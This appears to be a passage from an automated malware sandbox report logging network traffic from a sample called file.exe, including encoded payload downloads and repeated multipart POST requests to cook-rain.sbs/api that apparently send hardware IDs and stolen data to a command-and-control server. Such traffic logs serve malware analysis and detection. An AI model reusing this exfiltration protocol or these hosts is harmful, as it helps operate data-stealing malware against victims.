                                                                                                                                                                                                            2024-11-22 03:26:01 UTC1369INData Raw: 68 56 4e 57 4d 78 43 50 6d 58 66 54 70 74 32 59 57 55 30 45 78 74 6d 6c 70 44 77 36 52 4f 52 7a 38 2f 35 2b 4d 46 4f 43 53 69 59 31 34 6d 4a 32 56 42 30 37 5a 4a 66 55 6e 69 77 59 65 55 55 79 36 65 57 51 79 55 37 41 49 4b 63 7a 44 77 70 56 52 30 43 37 78 6a 58 43 74 6a 64 67 62 50 38 45 39 30 44 4c 75 46 68 35 64 54 4b 35 68 61 41 70 33 73 52 30 77 33 4e 75 37 6a 44 7a 73 71 72 6d 6c 64 4b 53 39 6e 51 74 65 78 52 48 4e 44 36 4d 44 4c 30 42 55 71 68 52 5a 62 32 39 56 42 55 69 51 6e 35 4b 55 54 65 6a 66 72 62 31 35 74 65 79 6c 4a 78 4c 70 43 64 6b 6e 73 77 49 69 52 55 69 43 62 57 67 6d 53 37 45 52 4c 4f 69 58 72 36 51 49 7a 49 4b 64 6d 58 79 63 67 5a 41 69 59 38 45 39 67 44 4c 75 46 70 35 6c 59 41 35 5a 61 42 4e 76 37 44 46 31 7a 4d 4f 53 6c 56 48 51 69 6f
                                                                                                                                                                                                            Data Ascii: hVNWMxCPmXfTpt2YWU0ExtmlpDw6RORz8/5+MFOCSiY14mJ2VB07ZJfUniwYeUUy6eWQyU7AIKczDwpVR0C7xjXCtjdgbP8E90DLuFh5dTK5haAp3sR0w3Nu7jDzsqrmldKS9nQtexRHND6MDL0BUqhRZb29VBUiQn5KUTejfrb15teylJxLpCdknswIiRUiCbWgmS7ERLOiXr6QIzIKdmXycgZAiY8E9gDLuFp5lYA5ZaBNv7DF1zMOSlVHQio
                                                                                                                                                                                                            2024-11-22 03:26:01 UTC1369INData Raw: 7a 61 67 72 6e 70 6b 74 75 52 2b 37 4a 79 34 45 62 4e 4e 31 52 44 39 75 38 41 6b 49 38 50 75 76 71 44 54 30 69 70 6d 31 62 4b 43 4a 76 54 4e 79 36 53 48 35 4b 34 73 43 42 6e 56 51 6e 6c 46 45 4c 6e 4f 64 51 42 48 31 33 37 2f 31 4d 62 47 36 43 62 30 41 6a 4d 79 6c 58 6d 4b 6b 49 66 30 43 6a 6e 63 75 61 58 79 4b 5a 55 51 2b 64 34 55 52 4a 4d 6a 6a 70 35 51 4d 77 4a 61 4a 75 55 79 41 6d 5a 45 7a 45 75 6b 4e 33 51 4f 72 4a 68 74 34 62 62 5a 70 4f 51 38 4f 6b 63 30 6b 39 4f 65 2f 7a 54 43 74 67 73 69 68 56 49 57 4d 78 43 4e 65 38 52 33 74 44 34 4d 61 4b 6c 45 63 2f 6b 56 38 4c 6e 75 68 4a 53 6a 55 6c 37 75 6f 46 4e 79 32 69 62 31 6f 68 4b 57 70 50 6c 76 34 49 66 31 53 6a 6e 63 75 39 51 6a 32 51 46 68 7a 56 2f 51 4a 44 50 33 65 77 70 51 51 35 4a 71 46 73 56 53
                                                                                                                                                                                                            Data Ascii: zagrnpktuR+7Jy4EbNN1RD9u8AkI8PuvqDT0ipm1bKCJvTNy6SH5K4sCBnVQnlFELnOdQBH137/1MbG6Cb0AjMylXmKkIf0CjncuaXyKZUQ+d4URJMjjp5QMwJaJuUyAmZEzEukN3QOrJht4bbZpOQ8Okc0k9Oe/zTCtgsihVIWMxCNe8R3tD4MaKlEc/kV8LnuhJSjUl7uoFNy2ib1ohKWpPlv4If1Sjncu9Qj2QFhzV/QJDP3ewpQQ5JqFsVS
                                                                                                                                                                                                            2024-11-22 03:26:01 UTC1369INData Raw: 31 62 42 4d 66 45 76 6d 78 6f 65 56 55 69 36 53 55 67 71 56 37 55 30 45 66 58 66 76 2f 55 78 73 62 6f 70 7a 55 53 45 75 4b 56 65 59 71 51 68 2f 51 4b 4f 64 79 35 4a 62 4b 4a 31 63 42 5a 2f 68 52 45 34 32 4e 2b 50 6d 41 7a 41 6f 72 32 64 53 4a 69 70 6f 54 74 4f 36 51 33 35 42 34 4d 4f 4e 33 68 74 74 6d 6b 35 44 77 36 52 69 58 7a 34 37 37 36 55 54 65 6a 66 72 62 31 35 74 65 79 6c 44 32 72 52 50 65 45 48 67 7a 59 36 61 58 79 69 64 58 68 47 54 35 45 56 57 49 54 66 68 34 41 41 33 4c 71 39 75 57 79 73 67 62 51 69 59 38 45 39 67 44 4c 75 46 70 70 4a 53 42 4a 70 4e 51 34 53 71 57 77 51 30 4f 36 69 39 54 44 55 6c 6f 57 64 66 4c 69 56 71 51 39 4f 36 53 58 39 45 37 74 65 49 6b 56 6f 70 6e 56 6b 46 6e 65 56 4e 51 6a 51 2b 36 65 30 4c 64 47 44 72 62 30 70 74 65 79 6c
                                                                                                                                                                                                            Data Ascii: 1bBMfEvmxoeVUi6SUgqV7U0EfXfv/UxsbopzUSEuKVeYqQh/QKOdy5JbKJ1cBZ/hRE42N+PmAzAor2dSJipoTtO6Q35B4MON3httmk5Dw6RiXz4776UTejfrb15teylD2rRPeEHgzY6aXyidXhGT5EVWITfh4AA3Lq9uWysgbQiY8E9gDLuFppJSBJpNQ4SqWwQ0O6i9TDUloWdfLiVqQ9O6SX9E7teIkVopnVkFneVNQjQ+6e0LdGDrb0pteyl
                                                                                                                                                                                                            2024-11-22 03:26:01 UTC1369INData Raw: 7a 67 43 6f 38 72 4c 78 6d 78 74 6c 46 45 59 69 76 4a 50 56 44 52 33 31 36 74 4d 4c 47 37 7a 4b 47 63 75 4c 57 64 50 77 4b 45 46 58 31 72 70 77 70 75 5a 51 69 4c 64 47 45 4f 64 70 42 6f 58 66 58 66 73 39 45 78 73 66 76 6b 7a 42 33 35 30 4f 52 72 4a 2f 6c 45 34 57 71 4f 64 32 64 41 56 50 39 30 4f 51 39 7a 6e 55 46 59 31 4e 50 37 6d 53 77 6f 51 6a 48 4a 66 4b 7a 52 34 64 75 69 33 55 6e 56 4b 39 4e 54 48 69 31 59 6a 6b 31 45 56 32 36 6f 43 53 33 4e 76 30 61 56 45 64 42 48 6c 4b 45 70 74 65 79 6c 39 31 62 35 47 66 31 72 79 69 4b 79 45 57 43 75 4b 52 30 50 56 70 45 51 45 61 32 65 6d 70 51 67 6c 62 76 4d 34 41 48 5a 32 4f 68 2b 47 34 6c 63 32 56 61 50 54 79 38 59 48 59 39 31 45 51 38 4f 6b 42 55 63 68 4a 65 37 6d 47 6a 64 70 6c 56 5a 38 4b 69 56 73 54 38 62 79
                                                                                                                                                                                                            Data Ascii: zgCo8rLxmxtlFEYivJPVDR316tMLG7zKGcuLWdPwKEFX1rpwpuZQiLdGEOdpBoXfXfs9ExsfvkzB350ORrJ/lE4WqOd2dAVP90OQ9znUFY1NP7mSwoQjHJfKzR4dui3UnVK9NTHi1Yjk1EV26oCS3Nv0aVEdBHlKEpteyl91b5Gf1ryiKyEWCuKR0PVpEQEa2empQglbvM4AHZ2Oh+G4lc2VaPTy8YHY91EQ8OkBUchJe7mGjdplVZ8KiVsT8by
                                                                                                                                                                                                            2024-11-22 03:26:01 UTC1369INData Raw: 37 69 68 5a 6c 55 4f 34 31 42 44 4e 75 71 41 6b 4a 7a 62 37 71 72 54 44 41 2f 36 7a 41 43 66 33 67 38 47 34 48 67 47 6d 63 43 2b 6f 57 64 33 67 31 2f 30 78 59 52 32 37 77 43 41 7a 41 6c 2b 75 4d 50 49 69 33 73 56 6d 77 4b 4c 57 35 4a 77 4b 42 66 64 77 50 4e 38 36 71 67 61 7a 69 65 57 41 32 63 38 6c 4d 45 66 58 66 6e 70 56 51 4e 62 75 4d 6f 62 57 4e 6a 63 51 69 4f 38 48 31 37 51 75 33 43 6e 59 38 59 43 70 4e 52 41 6f 33 30 56 55 74 38 47 64 37 45 54 48 70 75 72 53 67 4b 66 32 30 70 54 4d 66 77 45 43 67 65 75 4a 44 59 79 51 56 2f 67 68 67 61 32 2f 49 43 48 47 46 35 71 50 64 4d 62 47 37 73 61 30 41 2f 4a 57 70 65 31 66 64 32 52 6d 76 74 77 6f 71 49 52 53 43 52 64 77 43 4b 37 6e 78 36 4a 6a 54 6d 36 77 73 69 50 2b 73 6d 45 69 4a 6a 4d 58 47 57 2b 41 68 48 41
                                                                                                                                                                                                            Data Ascii: 7ihZlUO41BDNuqAkJzb7qrTDA/6zACf3g8G4HgGmcC+oWd3g1/0xYR27wCAzAl+uMPIi3sVmwKLW5JwKBfdwPN86qgazieWA2c8lMEfXfnpVQNbuMobWNjcQiO8H17Qu3CnY8YCpNRAo30VUt8Gd7ETHpurSgKf20pTMfwECgeuJDYyQV/ghga2/ICHGF5qPdMbG7sa0A/JWpe1fd2RmvtwoqIRSCRdwCK7nx6JjTm6wsiP+smEiJjMXGW+AhHA
                                                                                                                                                                                                            2024-11-22 03:26:01 UTC1369INData Raw: 4d 55 6a 32 65 46 43 2b 63 36 55 35 36 44 51 44 35 34 68 78 32 43 4b 68 2b 55 57 31 74 4b 56 43 57 36 41 68 56 58 75 54 56 69 4e 78 35 4b 70 42 61 51 34 53 71 57 77 51 6c 64 37 43 32 51 6e 51 38 36 7a 41 53 61 69 42 37 57 74 43 7a 58 6e 73 4c 33 66 75 6d 6a 46 49 39 6e 68 51 79 6c 75 42 55 55 54 41 6e 37 39 73 79 47 54 79 73 65 46 46 76 42 6c 4d 4b 35 36 5a 4c 65 45 4c 6b 68 63 58 65 54 57 33 46 46 69 36 4a 34 31 4a 48 63 52 4c 53 70 7a 30 69 4c 61 74 6d 56 57 30 38 4a 31 47 57 70 67 67 67 48 36 32 46 6d 64 34 4e 62 64 70 59 44 70 72 6e 54 45 63 68 4a 65 37 6d 47 6a 64 70 6c 56 5a 39 4a 69 4a 35 52 63 65 39 54 47 35 79 33 65 4b 4e 6d 31 49 54 6f 32 45 53 6e 50 51 41 59 6a 41 68 36 36 56 43 64 44 62 72 4d 42 49 4b 4a 57 78 50 6c 76 34 49 66 41 79 37 68 61
                                                                                                                                                                                                            Data Ascii: MUj2eFC+c6U56DQD54hx2CKh+UW1tKVCW6AhVXuTViNx5KpBaQ4SqWwQld7C2QnQ86zASaiB7WtCzXnsL3fumjFI9nhQyluBUUTAn79syGTyseFFvBlMK56ZLeELkhcXeTW3FFi6J41JHcRLSpz0iLatmVW08J1GWpgggH62Fmd4NbdpYDprnTEchJe7mGjdplVZ9JiJ5Rce9TG5y3eKNm1ITo2ESnPQAYjAh66VCdDbrMBIKJWxPlv4IfAy7ha


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.449732172.67.155.2484436568C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:03 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=5MJ6U170IRPXO
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 18139
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-22 03:26:03 UTC15331OUTData Raw: 2d 2d 35 4d 4a 36 55 31 37 30 49 52 50 58 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 45 34 39 30 41 44 41 37 38 35 46 41 45 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 35 4d 4a 36 55 31 37 30 49 52 50 58 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 4d 4a 36 55 31 37 30 49 52 50 58 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 35 4d 4a 36 55
                                                                                                                                                                                                            Data Ascii: --5MJ6U170IRPXOContent-Disposition: form-data; name="hwid"FBE490ADA785FAE6D7CBBD6DF28D3732--5MJ6U170IRPXOContent-Disposition: form-data; name="pid"2--5MJ6U170IRPXOContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--5MJ6U
                                                                                                                                                                                                            2024-11-22 03:26:03 UTC2808OUTData Raw: 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61
                                                                                                                                                                                                            Data Ascii: ~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                                                                                                                                            2024-11-22 03:26:04 UTC1007INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:03 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=43lkecvnr2rr6vs1b9sf338uuq; expires=Mon, 17-Mar-2025 21:12:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ii6g%2BqLXRQM4d7BHAEjVICfRlcy68qppBC9pKMMiZSZcW6oJ90Fu21smI4fLZq6l07sU3zQB2%2BwcyGxvduhe44UBnDiopiwTZKohW2nbl31zhbj6QALwlc2aLkp%2BUDme"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e65d0d67f800ca6-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1581&sent=8&recv=23&lost=0&retrans=0&sent_bytes=2828&recv_bytes=19093&delivery_rate=1806930&cwnd=221&unsent_bytes=0&cid=9bc226864efafb84&ts=1020&x=0"
                                                                                                                                                                                                            2024-11-22 03:26:04 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                            2024-11-22 03:26:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.449733172.67.155.2484436568C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:05 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=06PFFYO1JZLH
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 8754
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-22 03:26:05 UTC8754OUTData Raw: 2d 2d 30 36 50 46 46 59 4f 31 4a 5a 4c 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 45 34 39 30 41 44 41 37 38 35 46 41 45 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 30 36 50 46 46 59 4f 31 4a 5a 4c 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 36 50 46 46 59 4f 31 4a 5a 4c 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 36 50 46 46 59 4f 31
                                                                                                                                                                                                            Data Ascii: --06PFFYO1JZLHContent-Disposition: form-data; name="hwid"FBE490ADA785FAE6D7CBBD6DF28D3732--06PFFYO1JZLHContent-Disposition: form-data; name="pid"2--06PFFYO1JZLHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--06PFFYO1
                                                                                                                                                                                                            2024-11-22 03:26:06 UTC1007INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:06 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=hmueq85fvo82vn6iosv8bpufp2; expires=Mon, 17-Mar-2025 21:12:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTKxVi%2FgAJ%2BdPs%2Bv6qHbU3PcLN0Fm3aiHrGoR7T%2F3rciig1BYPq0Q7nsG0RHEqw2L4sb00EJzSS2cS04Gyelub8eQc1UkKbSCXy5Xa9Df4qg8MskQgNo5m1KOTzDFiHK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e65d0e4ea464314-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1778&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2829&recv_bytes=9684&delivery_rate=1239915&cwnd=181&unsent_bytes=0&cid=22f0a62f5d2949fa&ts=893&x=0"
                                                                                                                                                                                                            2024-11-22 03:26:06 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                            2024-11-22 03:26:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.449734172.67.155.2484436568C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:07 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=OF6NDIH7N9VCA
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 20413
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-22 03:26:07 UTC15331OUTData Raw: 2d 2d 4f 46 36 4e 44 49 48 37 4e 39 56 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 45 34 39 30 41 44 41 37 38 35 46 41 45 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4f 46 36 4e 44 49 48 37 4e 39 56 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 46 36 4e 44 49 48 37 4e 39 56 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4f 46 36 4e 44
                                                                                                                                                                                                            Data Ascii: --OF6NDIH7N9VCAContent-Disposition: form-data; name="hwid"FBE490ADA785FAE6D7CBBD6DF28D3732--OF6NDIH7N9VCAContent-Disposition: form-data; name="pid"3--OF6NDIH7N9VCAContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--OF6ND
                                                                                                                                                                                                            2024-11-22 03:26:07 UTC5082OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                            2024-11-22 03:26:08 UTC1003INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:08 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=dn5gb4eeq4v49kbqlte6ll3p4m; expires=Mon, 17-Mar-2025 21:12:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YyhvdUUcP7VSz6GWVHqVhLp6Y30qjwtF%2Bq7gerj13BKUn6oE2e8ZQHJk0KC1WhwvOZ1hYKzfg8P6whl0E2JkBhaUbGExoViwZbN72ihNQDYdoXveUyqHQssIRbNsaSC6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e65d0f38e78c32a-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1663&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2829&recv_bytes=21367&delivery_rate=1681059&cwnd=249&unsent_bytes=0&cid=a7bcba7656bbe454&ts=935&x=0"
                                                                                                                                                                                                            2024-11-22 03:26:08 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                            2024-11-22 03:26:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.449735172.67.155.2484436568C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:10 UTC268OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=A9FI0XLI
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1182
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-22 03:26:10 UTC1182OUTData Raw: 2d 2d 41 39 46 49 30 58 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 45 34 39 30 41 44 41 37 38 35 46 41 45 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 41 39 46 49 30 58 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 39 46 49 30 58 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 41 39 46 49 30 58 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                            Data Ascii: --A9FI0XLIContent-Disposition: form-data; name="hwid"FBE490ADA785FAE6D7CBBD6DF28D3732--A9FI0XLIContent-Disposition: form-data; name="pid"1--A9FI0XLIContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--A9FI0XLIContent-Di
                                                                                                                                                                                                            2024-11-22 03:26:11 UTC1000INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:11 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=hirpsv1goc61fit9imf6np70tg; expires=Mon, 17-Mar-2025 21:12:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
